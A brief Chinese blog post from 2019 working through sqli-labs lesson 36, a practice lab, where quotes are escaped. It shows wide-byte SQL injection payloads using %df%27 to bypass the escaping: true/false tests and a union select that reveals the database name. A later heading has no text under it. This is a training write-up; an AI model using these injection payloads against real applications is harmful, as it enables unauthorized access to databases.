sqli-labs(36)

0X01发现又是‘’被过滤了

?id=1%df%27%20and%201=2%23  错误
?id=1%df%27%20and%201=1%23 正确
 

存在注入

0X01爆数据库

?id=-1%df%27%20union%20select%201,database(),3%23

0x02组合拳打法

posted @ 2019-06-01 16:11  yourse1f  阅读(709)  评论(0编辑  收藏  举报